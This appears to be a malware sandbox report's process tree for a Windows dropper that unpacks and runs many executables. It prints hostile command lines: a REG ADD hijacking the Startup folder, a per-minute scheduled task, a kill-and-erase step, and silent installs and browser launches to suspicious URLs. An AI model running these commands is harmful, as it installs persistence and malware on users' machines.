C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1682c535a6fcb6e7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1682c535a6fcb6e7.exeSat1682c535a6fcb6e7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1612020d5c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1612020d5c.exeSat1612020d5c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\7⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\8⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat163b771375.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exeSat163b771375.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exe"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exe" -u6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16066e28b50208.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exeSat16066e28b50208.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exeC:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1624bfc23ff9f.exe /mixtwo4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exeSat1624bfc23ff9f.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exeSat1624bfc23ff9f.exe /mixtwo6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat1624bfc23ff9f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sat1624bfc23ff9f.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat160ff2e199851.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat160ff2e199851.exeSat160ff2e199851.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 18606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16156abf9c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16156abf9c.exeSat16156abf9c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1637cdb9d96.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1637cdb9d96.exeSat1637cdb9d96.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16af470129.exe4⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe fcb5a9b066a67e58a6b11c76f5aa06e9 PoCBdPX16U6ODzUp3gO8FQ.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exeSat16af470129.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmp"C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmp" /SL5="$20162,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exe" /S /UID=27203⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\ff-a24a0-33b-f8a9b-2ef30998056b6\Bovikunipu.exe"C:\Users\Admin\AppData\Local\Temp\ff-a24a0-33b-f8a9b-2ef30998056b6\Bovikunipu.exe"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a347186⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4692 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a347186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514835⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a347186⤵
-
C:\Users\Admin\AppData\Local\Temp\5f-7c819-343-3fcb8-06c9918c670bf\Qaraebubuly.exe"C:\Users\Admin\AppData\Local\Temp\5f-7c819-343-3fcb8-06c9918c670bf\Qaraebubuly.exe"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hw4gjmq0.vjg\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\hw4gjmq0.vjg\installer.exeC:\Users\Admin\AppData\Local\Temp\hw4gjmq0.vjg\installer.exe /qn CAMPAIGN="654"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exeC:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe"C:\Users\Admin\AppData\Local\Temp\voykcqjm.1qb\any.exe" -u7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cg4kqisd.4ap\autosubplayer.exe /S & exit5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe"C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe" /VERYSILENT4⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 4563⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5192 -ip 51921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4552 -ip 45521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5028 -ip 50281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3676 -ip 36761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5452 -ip 54521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1100 -ip 11001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2216 -ip 22161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1628 -ip 16281⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 680 -p 6564 -ip 65641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 6580 -ip 65801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 7040 -ip 70401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7084 -ip 70841⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 5048 -ip 50481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3568 -ip 35681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 4483⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6812 -ip 68121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe fcb5a9b066a67e58a6b11c76f5aa06e9 PoCBdPX16U6ODzUp3gO8FQ.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5028 -ip 50281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2616 -ip 26161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5288 -ip 52881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2396 -ip 23961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3532 -ip 35321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4056 -ip 40561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3560 -ip 35601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6628 -ip 66281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\4BF9.exeC:\Users\Admin\AppData\Local\Temp\4BF9.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4BF9.exeC:\Users\Admin\AppData\Local\Temp\4BF9.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 720 -ip 7201⤵
-
